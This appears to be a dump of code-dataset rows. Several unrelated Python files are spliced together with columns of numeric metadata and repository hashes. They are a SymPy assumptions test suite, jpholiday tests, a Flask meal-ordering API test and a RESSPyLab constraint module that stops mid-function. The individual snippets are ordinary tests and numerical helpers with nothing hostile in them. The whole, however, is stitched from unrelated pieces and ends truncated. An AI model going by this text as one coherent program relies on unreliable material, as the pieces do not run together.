    x, y = symbols('x,y')
    assert ask(Q.prime(x), Q.prime(x)) == True
    assert ask(Q.prime(x), ~Q.prime(x)) == False
    assert ask(Q.prime(x), Q.integer(x)) == None
    assert ask(Q.prime(x), ~Q.integer(x)) == False
    assert ask(Q.prime(2*x), Q.integer(x)) == False
    assert ask(Q.prime(x*y)) == None
    assert ask(Q.prime(x*y), Q.prime(x)) == None
    # a product (or power) of two symbolic integers is never prime here
    assert ask(Q.prime(x*y), Q.integer(x) & Q.integer(y)) == False
    assert ask(Q.prime(x**2), Q.integer(x)) == False
    assert ask(Q.prime(x**2), Q.prime(x)) == False
    assert ask(Q.prime(x**y), Q.integer(x) & Q.integer(y)) == False
def test_positive():
    """ask(Q.positive) over sums, products, squares, exp, and Abs."""
    x, y, z, w = symbols('x,y,z,w')
    assert ask(Q.positive(x), Q.positive(x)) == True
    assert ask(Q.positive(x), Q.negative(x)) == False
    assert ask(Q.positive(x), Q.nonzero(x)) == None
    assert ask(Q.positive(-x), Q.positive(x)) == False
    assert ask(Q.positive(-x), Q.negative(x)) == True
    assert ask(Q.positive(x+y), Q.positive(x) & Q.positive(y)) == True
    assert ask(Q.positive(x+y), Q.positive(x) & Q.negative(y)) == None
    assert ask(Q.positive(2*x), Q.positive(x)) == True
    # one positive * two negatives * one positive => positive product
    assumptions = Q.positive(x) & Q.negative(y) & Q.negative(z) & Q.positive(w)
    assert ask(Q.positive(x*y*z)) == None
    assert ask(Q.positive(x*y*z), assumptions) == True
    assert ask(Q.positive(-x*y*z), assumptions) == False
    assert ask(Q.positive(x**2), Q.positive(x)) == True
    assert ask(Q.positive(x**2), Q.negative(x)) == True
    #exponential
    assert ask(Q.positive(exp(x)), Q.real(x)) == True
    assert ask(Q.positive(x + exp(x)), Q.real(x)) == None
    #absolute value
    assert ask(Q.positive(Abs(x))) == None # Abs(0) = 0
    assert ask(Q.positive(Abs(x)), Q.positive(x)) == True
@XFAIL
def test_positive_xfail():
    """Known failure: positivity of 1/(1 + x**2) for real x is not deduced."""
    # NOTE(review): relies on a module-level symbol ``x`` (not defined in
    # this function) -- confirm it exists at import time.
    assert ask(Q.positive(1/(1 + x**2)), Q.real(x)) == True
def test_real():
    """ask(Q.real) over arithmetic, powers, trig, exp, and re/im."""
    x, y = symbols('x,y')
    assert ask(Q.real(x)) == None
    assert ask(Q.real(x), Q.real(x)) == True
    assert ask(Q.real(x), Q.nonzero(x)) == True
    assert ask(Q.real(x), Q.positive(x)) == True
    assert ask(Q.real(x), Q.negative(x)) == True
    assert ask(Q.real(x), Q.integer(x)) == True
    assert ask(Q.real(x), Q.even(x)) == True
    assert ask(Q.real(x), Q.prime(x)) == True
    assert ask(Q.real(x/sqrt(2)), Q.real(x)) == True
    # sqrt(-2) is imaginary, so the quotient leaves the reals
    assert ask(Q.real(x/sqrt(-2)), Q.real(x)) == False
    I = S.ImaginaryUnit
    assert ask(Q.real(x+1), Q.real(x)) == True
    assert ask(Q.real(x+I), Q.real(x)) == False
    assert ask(Q.real(x+I), Q.complex(x)) == None
    assert ask(Q.real(2*x), Q.real(x)) == True
    assert ask(Q.real(I*x), Q.real(x)) == False
    assert ask(Q.real(I*x), Q.imaginary(x)) == True
    assert ask(Q.real(I*x), Q.complex(x)) == None
    assert ask(Q.real(x**2), Q.real(x)) == True
    assert ask(Q.real(sqrt(x)), Q.negative(x)) == False
    assert ask(Q.real(x**y), Q.real(x) & Q.integer(y)) == True
    assert ask(Q.real(x**y), Q.real(x) & Q.real(y)) == None
    assert ask(Q.real(x**y), Q.positive(x) & Q.real(y)) == True
    # trigonometric functions
    assert ask(Q.real(sin(x))) == None
    assert ask(Q.real(cos(x))) == None
    assert ask(Q.real(sin(x)), Q.real(x)) == True
    assert ask(Q.real(cos(x)), Q.real(x)) == True
    # exponential function
    assert ask(Q.real(exp(x))) == None
    assert ask(Q.real(exp(x)), Q.real(x)) == True
    assert ask(Q.real(x + exp(x)), Q.real(x)) == True
    # Q.complexes
    assert ask(Q.real(re(x))) == True
    assert ask(Q.real(im(x))) == True
def test_algebraic():
    """ask(Q.algebraic) on radicals, I, transcendental args, and floats."""
    x, y = symbols('x,y')
    assert ask(Q.algebraic(x)) == None
    assert ask(Q.algebraic(I)) == True
    assert ask(Q.algebraic(2*I)) == True
    assert ask(Q.algebraic(I/3)) == True
    assert ask(Q.algebraic(sqrt(7))) == True
    assert ask(Q.algebraic(2*sqrt(7))) == True
    assert ask(Q.algebraic(sqrt(7)/3)) == True
    assert ask(Q.algebraic(I*sqrt(3))) == True
    assert ask(Q.algebraic(sqrt(1+I*sqrt(3)))) == True
    # NOTE(review): the exponent binds to sqrt(3) only, not to
    # (1+I*sqrt(3)) -- possibly a precedence typo; confirm intent.
    assert ask(Q.algebraic((1+I*sqrt(3)**(S(17)/31)))) == True
    assert ask(Q.algebraic((1+I*sqrt(3)**(S(17)/pi)))) == False
    assert ask(Q.algebraic(sin(7))) == None
    assert ask(Q.algebraic(sqrt(sin(7)))) == None
    assert ask(Q.algebraic(sqrt(y+I*sqrt(7)))) == None
    # infinities and inexact floats are not algebraic
    assert ask(Q.algebraic(oo)) == False
    assert ask(Q.algebraic(-oo)) == False
    assert ask(Q.algebraic(2.47)) == False
def test_global():
    """Test ask with global assumptions"""
    x = symbols('x')
    assert ask(Q.integer(x)) == None
    global_assumptions.add(Q.integer(x))
    assert ask(Q.integer(x)) == True
    # clearing the global context restores the undecided state
    global_assumptions.clear()
    assert ask(Q.integer(x)) == None
def test_custom_context():
    """Test ask with custom assumptions context"""
    x = symbols('x')
    assert ask(Q.integer(x)) == None
    local_context = AssumptionsContext()
    local_context.add(Q.integer(x))
    # the local context applies only when passed explicitly
    assert ask(Q.integer(x), context = local_context) == True
    assert ask(Q.integer(x)) == None
def test_functions_in_assumptions():
    """Logical connectives (Implies, Equivalent, Xor) as assumptions."""
    from sympy.logic.boolalg import Equivalent, Xor
    x = symbols('x')
    assert ask(Q.negative(x), Q.real(x) >> Q.positive(x)) is False
    assert ask(Q.negative(x), Equivalent(Q.real(x), Q.positive(x))) is False
    assert ask(Q.negative(x), Xor(Q.real(x), Q.negative(x))) is False
def test_composite_ask():
    """A conjunction as the queried proposition, with an implication assumption."""
    x = symbols('x')
    assert ask(Q.negative(x) & Q.integer(x),
               assumptions=Q.real(x) >> Q.positive(x)) is False
def test_composite_proposition():
    """ask on compound propositions: Not, And, Or, Implies, Equivalent."""
    from sympy.logic.boolalg import Equivalent, Implies
    x = symbols('x')
    assert ask(True) is True
    assert ask(~Q.negative(x), Q.positive(x)) is True
    assert ask(~Q.real(x), Q.commutative(x)) is None
    assert ask(Q.negative(x) & Q.integer(x), Q.positive(x)) is False
    assert ask(Q.negative(x) & Q.integer(x)) is None
    assert ask(Q.real(x) | Q.integer(x), Q.positive(x)) is True
    assert ask(Q.real(x) | Q.integer(x)) is None
    assert ask(Q.real(x) >> Q.positive(x), Q.negative(x)) is False
    # evaluate=False keeps the Implies node unevaluated before asking
    assert ask(Implies(Q.real(x), Q.positive(x), evaluate=False), Q.negative(x)) is False
    assert ask(Implies(Q.real(x), Q.positive(x), evaluate=False)) is None
    assert ask(Equivalent(Q.integer(x), Q.even(x)), Q.even(x)) is True
    assert ask(Equivalent(Q.integer(x), Q.even(x))) is None
    assert ask(Equivalent(Q.positive(x), Q.integer(x)), Q.integer(x)) is None
def test_incompatible_resolutors():
    """Conflicting handler results raise ValueError; an inconclusive (None)
    extra handler does not disturb the existing answer."""
    x = symbols('x')
    class Prime2AskHandler(AskHandler):
        @staticmethod
        def Number(expr, assumptions):
            return True
    register_handler('prime', Prime2AskHandler)
    # 4 is not prime, but the extra handler says True -> contradiction
    # (string form of raises() is the old py2-era API of this test suite)
    raises(ValueError, 'ask(Q.prime(4))')
    remove_handler('prime', Prime2AskHandler)
    class InconclusiveHandler(AskHandler):
        @staticmethod
        def Number(expr, assumptions):
            return None
    register_handler('prime', InconclusiveHandler)
    assert ask(Q.prime(3)) == True
def test_key_extensibility():
    """test that you can add keys to the ask system at runtime"""
    x = Symbol('x')
    # make sure the key is not defined
    raises(AttributeError, "ask(Q.my_key(x))")
    class MyAskHandler(AskHandler):
        @staticmethod
        def Symbol(expr, assumptions):
            return True
    register_handler('my_key', MyAskHandler)
    assert ask(Q.my_key(x)) == True
    # the handler only covers Symbol, so a non-Symbol expr is undecided
    assert ask(Q.my_key(x+1)) == None
    remove_handler('my_key', MyAskHandler)
    # removing the handler and the key restores the original error
    del Q.my_key
    raises(AttributeError, "ask(Q.my_key(x))")
def test_type_extensibility():
    """test that new types can be added to the ask system at runtime

    We create a custom type MyType, and override ask Q.prime=True with handler
    MyAskHandler for this type
    TODO: test incompatible resolutors
    """
    from sympy.core import Basic
    class MyType(Basic):
        pass
    class MyAskHandler(AskHandler):
        # dispatch appears to be by class name: the staticmethod must be
        # named after the handled type (MyType) -- confirm in ask docs
        @staticmethod
        def MyType(expr, assumptions):
            return True
    a = MyType()
    register_handler(Q.prime, MyAskHandler)
    assert ask(Q.prime(a)) == True
def test_compute_known_facts():
    """Generated known-facts code must reproduce the module's CNF and dict."""
    ns = {}
    # Python 2 `exec ... in globals(), ns` statement syntax: evaluates the
    # generated source with ns as the local namespace.
    exec 'from sympy.logic.boolalg import And, Or, Not' in globals(), ns
    exec compute_known_facts() in globals(), ns
    assert ns['known_facts_cnf'] == known_facts_cnf
    assert ns['known_facts_dict'] == known_facts_dict
| 49.681854
| 132
| 0.580473
| 10,606
| 63,245
| 3.45182
| 0.016877
| 0.233051
| 0.257307
| 0.118929
| 0.934908
| 0.882737
| 0.842393
| 0.816799
| 0.760202
| 0.665447
| 0
| 0.004939
| 0.212412
| 63,245
| 1,272
| 133
| 49.720912
| 0.73004
| 0.004965
| 0
| 0.294384
| 0
| 0
| 0.003639
| 0
| 0
| 0
| 0
| 0.000786
| 0.860507
| 0
| null | null | 0.000906
| 0.009964
| null | null | 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
5d19ef0a7015aa6d5a530b6b72f64787c15f7a25
| 7,457
|
py
|
Python
|
tests/test_basic.py
|
TukamotoRyuzo/jpholiday
|
1527533fd975513297d637198bdf468d0c7c65f1
|
[
"MIT"
] | null | null | null |
tests/test_basic.py
|
TukamotoRyuzo/jpholiday
|
1527533fd975513297d637198bdf468d0c7c65f1
|
[
"MIT"
] | null | null | null |
tests/test_basic.py
|
TukamotoRyuzo/jpholiday
|
1527533fd975513297d637198bdf468d0c7c65f1
|
[
"MIT"
] | null | null | null |
# coding: utf-8
import datetime
import unittest
import jpholiday
import jpholiday.holiday
class TestBasic(unittest.TestCase):
    """Basic jpholiday behaviors: user-registered holidays, equinox date
    calculations (2000-2030), and one-off imperial/ceremonial holidays."""

    def test_original_holiday(self):
        """
        A user-registered OriginalHoliday subclass is honored by
        is_holiday/is_holiday_name, and can be unregistered again.
        """
        class TestHoliday(jpholiday.registry.OriginalHoliday):
            def _is_holiday(self, date):
                if date == datetime.date(2020, 2, 3) or date == datetime.date(2020, 2, 5):
                    return True
                if date == datetime.date(2020, 2, 9):
                    return True
                return False

            def _is_holiday_name(self, date):
                return '特別休暇'

        # Registered weekday dates report the custom name; in-between days do not.
        self.assertEqual(jpholiday.is_holiday_name(datetime.date(2020, 2, 3)), '特別休暇')
        self.assertEqual(jpholiday.is_holiday(datetime.date(2020, 2, 4)), False)
        self.assertEqual(jpholiday.is_holiday_name(datetime.date(2020, 2, 5)), '特別休暇')
        # Registered Sunday (2020-02-09): the following Monday is NOT a holiday.
        self.assertEqual(jpholiday.is_holiday_name(datetime.date(2020, 2, 9)), '特別休暇')
        self.assertEqual(jpholiday.is_holiday(datetime.date(2020, 2, 10)), False)
        jpholiday.registry.OriginalHoliday.unregister(TestHoliday)

    def test_vernal_equinox_day(self):
        """Vernal (spring) equinox day-of-March for 2000-2030."""
        expected = {
            2000: 20, 2001: 20, 2002: 21, 2003: 21, 2004: 20, 2005: 20,
            2006: 21, 2007: 21, 2008: 20, 2009: 20, 2010: 21, 2011: 21,
            2012: 20, 2013: 20, 2014: 21, 2015: 21, 2016: 20, 2017: 20,
            2018: 21, 2019: 21, 2020: 20, 2021: 20, 2022: 21, 2023: 21,
            2024: 20, 2025: 20, 2026: 20, 2027: 21, 2028: 20, 2029: 20,
            2030: 20,
        }
        for year, day in expected.items():
            self.assertEqual(
                jpholiday.holiday.VernalEquinoxDay._vernal_equinox_day(year), day)

    def test_autumn_equinox_day(self):
        """Autumnal equinox day-of-September for 2000-2030."""
        expected = {
            2000: 23, 2001: 23, 2002: 23, 2003: 23, 2004: 23, 2005: 23,
            2006: 23, 2007: 23, 2008: 23, 2009: 23, 2010: 23, 2011: 23,
            2012: 22, 2013: 23, 2014: 23, 2015: 23, 2016: 22, 2017: 23,
            2018: 23, 2019: 23, 2020: 22, 2021: 23, 2022: 23, 2023: 23,
            2024: 22, 2025: 23, 2026: 23, 2027: 23, 2028: 22, 2029: 23,
            2030: 23,
        }
        for year, day in expected.items():
            self.assertEqual(
                jpholiday.holiday.AutumnEquinoxDay._autumn_equinox_day(year), day)

    def test_other_holiday(self):
        """One-off imperial wedding/funeral/enthronement holidays."""
        self.assertEqual(jpholiday.is_holiday_name(datetime.date(1959, 4, 10)), '皇太子・明仁親王の結婚の儀')
        self.assertEqual(jpholiday.is_holiday_name(datetime.date(1989, 2, 24)), '昭和天皇の大喪の礼')
        self.assertEqual(jpholiday.is_holiday_name(datetime.date(1990, 11, 12)), '即位の礼正殿の儀')
        self.assertEqual(jpholiday.is_holiday_name(datetime.date(1993, 6, 9)), '皇太子・皇太子徳仁親王の結婚の儀')
| 63.194915
| 98
| 0.750034
| 833
| 7,457
| 6.446579
| 0.120048
| 0.198324
| 0.317318
| 0.357914
| 0.850093
| 0.845065
| 0.836499
| 0.836499
| 0.776536
| 0.050279
| 0
| 0.070577
| 0.144964
| 7,457
| 117
| 99
| 63.735043
| 0.77133
| 0.006169
| 0
| 0.021739
| 0
| 0
| 0.008449
| 0
| 0
| 0
| 0
| 0
| 0.771739
| 1
| 0.076087
| false
| 0
| 0.043478
| 0.01087
| 0.184783
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5d214d72b1c6a38180b59ebfa2843fd1ca9144bb
| 5,957
|
py
|
Python
|
tests/test_v1/test_orders.py
|
matthewacha/BookAMeal
|
6af638a4cf71d72dd2a5fa80ba0e908b7ef70cf5
|
[
"MIT"
] | null | null | null |
tests/test_v1/test_orders.py
|
matthewacha/BookAMeal
|
6af638a4cf71d72dd2a5fa80ba0e908b7ef70cf5
|
[
"MIT"
] | null | null | null |
tests/test_v1/test_orders.py
|
matthewacha/BookAMeal
|
6af638a4cf71d72dd2a5fa80ba0e908b7ef70cf5
|
[
"MIT"
] | 1
|
2018-08-20T11:57:23.000Z
|
2018-08-20T11:57:23.000Z
|
import unittest
import json
from app import APP
def login(tester):
    """Sign up and log in the fixture user via the test client.

    :param tester: Flask test client.
    :return dict: Decoded JSON body of the login response (contains 'token').
    """
    # The same credential payload is used for both signup and login.
    credentials = json.dumps(dict(email='men@gmail.com', password='lantern'))
    tester.post('api/v1/auth/signup', content_type='application/json',
                data=credentials)
    response = tester.post('api/v1/auth/login', content_type='application/json',
                           data=credentials)
    return json.loads(response.data.decode())
def add_meal(tester, result):
    """POST the three fixture meals (Fries, Beans, Chicken) to the meals API.

    :param tester: Flask test client.
    :param dict result: Login result containing the auth 'token'.
    :return: Response of the last (Chicken) POST.
    """
    headers = dict(access_token=result['token'])
    response = None
    # Same endpoint and headers for each meal; order matters for the fixture ids.
    for name, price in (('Fries', 5000), ('Beans', 5000), ('Chicken', 15000)):
        response = tester.post('/api/v1/meals/', content_type='application/json',
                               data=json.dumps(dict(name=name, price=price)),
                               headers=headers)
    return response
class TestOrders(unittest.TestCase):
    """Order endpoints: placing, listing, and deleting orders."""

    def setUp(self):
        self.tester = APP.test_client(self)

    def _headers(self, result):
        """Auth headers built from a login() result."""
        return dict(access_token=result['token'])

    def _prepare(self, menu_ids, order_ids):
        """Log in, add the fixture meals, publish ``menu_ids`` to the day's
        menu, then place ``order_ids``.

        :return tuple: (login result, response of the last order POST).
        """
        result = login(self.tester)
        add_meal(self.tester, result)
        headers = self._headers(result)
        for meal_id in menu_ids:
            self.tester.post('/api/v1/menu/%d' % meal_id, headers=headers)
        response = None
        for order_id in order_ids:
            response = self.tester.post('/api/v1/orders/%d' % order_id,
                                        headers=headers)
        return result, response

    def test_make_order(self):
        """test that a customer can make an order"""
        result, response = self._prepare([1, 2], [1, 2])
        self.assertIn(u"Successfully placed order", response.data)

    def test_fail_make_order(self):
        """test that ordering a meal not on the menu fails"""
        result, response = self._prepare([1, 2], [1, 4])
        self.assertIn(u"Not successful, try again", response.data)

    def test_get_all_orders(self):
        """test that a customer can get all orders from menu"""
        result, _ = self._prepare([3, 2], [3, 2])
        responsev = self.tester.get('/api/v1/orders',
                                    headers=self._headers(result))
        self.assertIn(u"Beans", responsev.data)

    def test_delete_orders(self):
        """tests that an order can be deleted"""
        result, _ = self._prepare([3, 2], [3, 2])
        responsev = self.tester.delete('/api/v1/orders/2',
                                       headers=self._headers(result))
        self.assertIn(u"Successfully deleted", responsev.data)

    def test_fail_delete_orders(self):
        """tests that deleting a nonexistent order fails"""
        result, _ = self._prepare([3, 2], [3, 2])
        responsev = self.tester.delete('/api/v1/orders/5',
                                       headers=self._headers(result))
        self.assertIn(u"Order does not exist", responsev.data)
# Allow running this test module directly.
if __name__ == "__main__":
    unittest.main()  # pragma: no cover
| 43.481752
| 80
| 0.512674
| 644
| 5,957
| 4.650621
| 0.141304
| 0.113523
| 0.147579
| 0.190985
| 0.832721
| 0.820033
| 0.8
| 0.777295
| 0.749249
| 0.703172
| 0
| 0.016406
| 0.35538
| 5,957
| 136
| 81
| 43.801471
| 0.763542
| 0.052711
| 0
| 0.639175
| 0
| 0
| 0.1426
| 0
| 0
| 0
| 0
| 0
| 0.051546
| 1
| 0.082474
| false
| 0.020619
| 0.030928
| 0
| 0.14433
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5d281d9a6af3b46a5276e67f16465bbf555e1e75
| 10,452
|
py
|
Python
|
RESSPyLab/vc_li_opt_constraints.py
|
ioannis-vm/RESSPyLab
|
306fc24d5f8ece8f2f2de274b56b80ba2019f605
|
[
"MIT"
] | 7
|
2019-10-15T09:16:41.000Z
|
2021-09-24T11:28:45.000Z
|
RESSPyLab/vc_li_opt_constraints.py
|
ioannis-vm/RESSPyLab
|
306fc24d5f8ece8f2f2de274b56b80ba2019f605
|
[
"MIT"
] | 3
|
2020-10-22T14:27:22.000Z
|
2021-11-15T17:46:49.000Z
|
RESSPyLab/vc_li_opt_constraints.py
|
ioannis-vm/RESSPyLab
|
306fc24d5f8ece8f2f2de274b56b80ba2019f605
|
[
"MIT"
] | 6
|
2019-07-22T05:47:10.000Z
|
2021-10-24T02:06:26.000Z
|
"""@package sqp_linsearch
Constraints on the original Voce-Chaboche model for limited information optimization.
"""
from numdifftools import nd_algopy as nda
import numpy as np
def g3_vco_upper(x, constants, variables):
    """ Constraint on the maximum ratio of stress at saturation to initial yield stress for the original VC model.

    :param np.ndarray x: Parameters of original Voce-Chaboche model; x[1] is
        the initial yield stress, x[2] the isotropic saturation stress, and
        (x[4+2i], x[5+2i]) the (C_i, gamma_i) pair of backstress i.
    :param dict constants: Defines the constants for the constraint ('rho_yield_sup').
    :param dict variables: Defines constraint values that depend on x (unused here).
    :return float: Value of the constraint in standard form (g(x) <= 0 feasible).
    """
    max_hardening_to_yield = constants['rho_yield_sup']
    n_backstresses = (len(x) - 4) // 2
    sy0 = x[1]
    q_inf = x[2]
    # Saturated kinematic hardening: sum of C_k / gamma_k over all backstresses.
    sum_ck_gammak = sum(x[4 + 2 * k] / x[5 + 2 * k] for k in range(n_backstresses))
    return (sy0 + q_inf + sum_ck_gammak) / sy0 - max_hardening_to_yield
def g3_vco_lower(x, constants, variables):
    """ Constraint on the minimum ratio of stress at saturation to initial yield stress for the original VC model.

    :param np.ndarray x: Parameters of original Voce-Chaboche model; x[1] is
        the initial yield stress, x[2] the isotropic saturation stress, and
        (x[4+2i], x[5+2i]) the (C_i, gamma_i) pair of backstress i.
    :param dict constants: Defines the constants for the constraint ('rho_yield_inf').
    :param dict variables: Defines constraint values that depend on x (unused here).
    :return float: Value of the constraint in standard form (g(x) <= 0 feasible).
    """
    min_hardening_to_yield = constants['rho_yield_inf']
    n_backstresses = (len(x) - 4) // 2
    sy0 = x[1]
    q_inf = x[2]
    # Saturated kinematic hardening: sum of C_k / gamma_k over all backstresses.
    sum_ck_gammak = sum(x[4 + 2 * k] / x[5 + 2 * k] for k in range(n_backstresses))
    return -(sy0 + q_inf + sum_ck_gammak) / sy0 + min_hardening_to_yield
def g4_vco_upper(x, constants, variables):
    """ Constraint on the maximum ratio of isotropic to combined isotropic/kinematic hardening at saturation for the
    original VC model.

    :param np.ndarray x: Parameters of original Voce-Chaboche model; x[2] is
        the isotropic saturation stress and (x[4+2i], x[5+2i]) the
        (C_i, gamma_i) pair of backstress i.
    :param dict constants: Defines the constants for the constraint ('rho_iso_sup').
    :param dict variables: Defines constraint values that depend on x (unused here).
    :return float: Value of the constraint in standard form (g(x) <= 0 feasible).
    """
    iso_kin_ratio_max = constants['rho_iso_sup']
    q_inf = x[2]
    n_backstresses = (len(x) - 4) // 2
    # Saturated kinematic hardening: sum of C_k / gamma_k over all backstresses.
    sum_ck_gammak = sum(x[4 + 2 * k] / x[5 + 2 * k] for k in range(n_backstresses))
    return q_inf / (q_inf + sum_ck_gammak) - iso_kin_ratio_max
def g4_vco_lower(x, constants, variables):
    """ Constraint on the minimum ratio of isotropic to combined isotropic/kinematic hardening at saturation for the
    original VC model.

    :param np.ndarray x: Parameters of original Voce-Chaboche model; x[2] is
        the isotropic saturation stress and (x[4+2i], x[5+2i]) the
        (C_i, gamma_i) pair of backstress i.
    :param dict constants: Defines the constants for the constraint ('rho_iso_inf').
    :param dict variables: Defines constraint values that depend on x (unused here).
    :return float: Value of the constraint in standard form (g(x) <= 0 feasible).
    """
    iso_kin_ratio_min = constants['rho_iso_inf']
    q_inf = x[2]
    n_backstresses = (len(x) - 4) // 2
    # Saturated kinematic hardening: sum of C_k / gamma_k over all backstresses.
    sum_ck_gammak = sum(x[4 + 2 * k] / x[5 + 2 * k] for k in range(n_backstresses))
    return -q_inf / (q_inf + sum_ck_gammak) + iso_kin_ratio_min
def g5_vco_lower(x, constants, variables):
    """ Constraint on the lower bound ratio of gamma_1 to b for the original VC model.

    :param np.ndarray x: Parameters of original Voce-Chaboche model; x[3] is b
        and x[5] is gamma_1.
    :param dict constants: Defines the constants for the constraint ('rho_gamma_inf').
    :param dict variables: Defines constraint values that depend on x (unused here).
    :return float: Value of the constraint in standard form (g(x) <= 0 feasible).
    """
    b = x[3]
    gamma1 = x[5]
    gamma_b_ratio_min = constants['rho_gamma_inf']
    return -gamma1 / b + gamma_b_ratio_min
def g5_vco_upper(x, constants, variables):
    """ Constraint on the upper bound ratio of gamma_1 to b for the original VC model.

    :param np.ndarray x: Parameters of original Voce-Chaboche model; x[3] is b
        and x[5] is gamma_1.
    :param dict constants: Defines the constants for the constraint ('rho_gamma_sup').
    :param dict variables: Defines constraint values that depend on x (unused here).
    :return float: Value of the constraint in standard form (g(x) <= 0 feasible).
    """
    b = x[3]
    gamma1 = x[5]
    gamma_b_ratio_max = constants['rho_gamma_sup']
    return gamma1 / b - gamma_b_ratio_max
def g6_vco_lower(x, constants, variables):
    """ Constraint on the lower bound ratio of gamma_1 to gamma_2 for the original VC model.

    gamma_1 is always x[5] and gamma_2 is always x[7].

    :param np.ndarray x: Parameters of original Voce-Chaboche model (two backstresses).
    :param dict constants: Defines the constants for the constraint ('rho_gamma_12_inf').
    :param dict variables: Defines constraint values that depend on x (unused here).
    :return float: Value of the constraint in standard form (g(x) <= 0 feasible).
    """
    gamma1 = x[5]
    gamma2 = x[7]
    gamma_1_2_ratio_min = constants['rho_gamma_12_inf']
    return -gamma1 / gamma2 + gamma_1_2_ratio_min
def g6_vco_upper(x, constants, variables):
    """ Constraint on the upper bound ratio of gamma_1 to gamma_2 for the original VC model.

    gamma_1 is always x[5] and gamma_2 is always x[7].

    :param np.ndarray x: Parameters of original Voce-Chaboche model (two backstresses).
    :param dict constants: Defines the constants for the constraint ('rho_gamma_12_sup').
    :param dict variables: Defines constraint values that depend on x (unused here).
    :return float: Value of the constraint in standard form (g(x) <= 0 feasible).
    """
    gamma1 = x[5]
    gamma2 = x[7]
    gamma_1_2_ratio_max = constants['rho_gamma_12_sup']
    return gamma1 / gamma2 - gamma_1_2_ratio_max
def g_kin_ratio_vco_lower(x, constants, variables):
    """ Constraint on the lower bound ratio of (C_1/gamma_1) to (C_2/gamma_2) for the original VC model.

    :param np.ndarray x: Parameters of original Voce-Chaboche model; x[4:8]
        are (C_1, gamma_1, C_2, gamma_2).
    :param dict constants: Defines the constants for the constraint ('rho_kin_ratio_inf').
    :param dict variables: Defines constraint values that depend on x (unused here).
    :return float: Value of the constraint in standard form (g(x) <= 0 feasible).
    """
    c1 = x[4]
    gamma1 = x[5]
    c2 = x[6]
    gamma2 = x[7]
    gamma_kin_ratio_min = constants['rho_kin_ratio_inf']
    return -(c1 / gamma1) / (c2 / gamma2) + gamma_kin_ratio_min
def g_kin_ratio_vco_upper(x, constants, variables):
    """ Constraint on the upper bound of the kinematic hardening ratio (c_1/gamma_1) / (c_2/gamma_2).

    c_1 is always x[4], gamma_1 is always x[5], c_2 is always x[6], and gamma_2 is always x[7].

    :param np.ndarray x: Parameters of original Voce-Chaboche model.
    :param dict constants: Defines the constants for the constraint.
    :param dict variables: Defines constraint values that depend on x.
    :return float: Value of the constraint in standard form.
    """
    kin_ratio = (x[4] / x[5]) / (x[6] / x[7])
    return kin_ratio - constants['rho_kin_ratio_sup']
# Gradients and Hessians of all the above constraints
def g3_vco_lower_gradient(x, constants, variables):
    """ Numerical gradient of g3_vco_lower, returned as an (n, 1) column vector. """
    fun_wrapper = lambda x1: g3_vco_lower(x1, constants, variables)
    grad_fun = nda.Gradient(fun_wrapper)
    grad = grad_fun(x)
    return np.reshape(grad, (-1, 1))


def g3_vco_upper_gradient(x, constants, variables):
    """ Numerical gradient of g3_vco_upper, returned as an (n, 1) column vector. """
    fun_wrapper = lambda x1: g3_vco_upper(x1, constants, variables)
    grad_fun = nda.Gradient(fun_wrapper)
    grad = grad_fun(x)
    return np.reshape(grad, (-1, 1))


def g4_vco_lower_gradient(x, constants, variables):
    """ Numerical gradient of g4_vco_lower, returned as an (n, 1) column vector. """
    fun_wrapper = lambda x1: g4_vco_lower(x1, constants, variables)
    grad_fun = nda.Gradient(fun_wrapper)
    grad = grad_fun(x)
    return np.reshape(grad, (-1, 1))


def g4_vco_upper_gradient(x, constants, variables):
    """ Numerical gradient of g4_vco_upper, returned as an (n, 1) column vector. """
    fun_wrapper = lambda x1: g4_vco_upper(x1, constants, variables)
    grad_fun = nda.Gradient(fun_wrapper)
    grad = grad_fun(x)
    return np.reshape(grad, (-1, 1))


def g5_vco_lower_gradient(x, constants, variables):
    """ Numerical gradient of g5_vco_lower, returned as an (n, 1) column vector. """
    fun_wrapper = lambda x1: g5_vco_lower(x1, constants, variables)
    grad_fun = nda.Gradient(fun_wrapper)
    grad = grad_fun(x)
    return np.reshape(grad, (-1, 1))


def g5_vco_upper_gradient(x, constants, variables):
    """ Numerical gradient of g5_vco_upper, returned as an (n, 1) column vector. """
    fun_wrapper = lambda x1: g5_vco_upper(x1, constants, variables)
    grad_fun = nda.Gradient(fun_wrapper)
    grad = grad_fun(x)
    return np.reshape(grad, (-1, 1))
def g6_vco_lower_gradient(x, constants, variables):
    """ Numerical gradient of g6_vco_lower, returned as an (n, 1) column vector. """
    fun_wrapper = lambda x1: g6_vco_lower(x1, constants, variables)
    grad_fun = nda.Gradient(fun_wrapper)
    grad = grad_fun(x)
    # Consistency fix: the g3/g4/g5 gradient helpers all reshape to an (n, 1)
    # column vector; this one previously leaked the raw 1-D gradient.
    return np.reshape(grad, (-1, 1))


def g6_vco_upper_gradient(x, constants, variables):
    """ Numerical gradient of g6_vco_upper, returned as an (n, 1) column vector. """
    fun_wrapper = lambda x1: g6_vco_upper(x1, constants, variables)
    grad_fun = nda.Gradient(fun_wrapper)
    grad = grad_fun(x)
    # Consistency fix: reshape to match the other gradient helpers.
    return np.reshape(grad, (-1, 1))


def g_kin_ratio_vco_lower_gradient(x, constants, variables):
    """ Numerical gradient of g_kin_ratio_vco_lower, returned as an (n, 1) column vector. """
    fun_wrapper = lambda x1: g_kin_ratio_vco_lower(x1, constants, variables)
    grad_fun = nda.Gradient(fun_wrapper)
    grad = grad_fun(x)
    # Consistency fix: reshape to match the other gradient helpers.
    return np.reshape(grad, (-1, 1))


def g_kin_ratio_vco_upper_gradient(x, constants, variables):
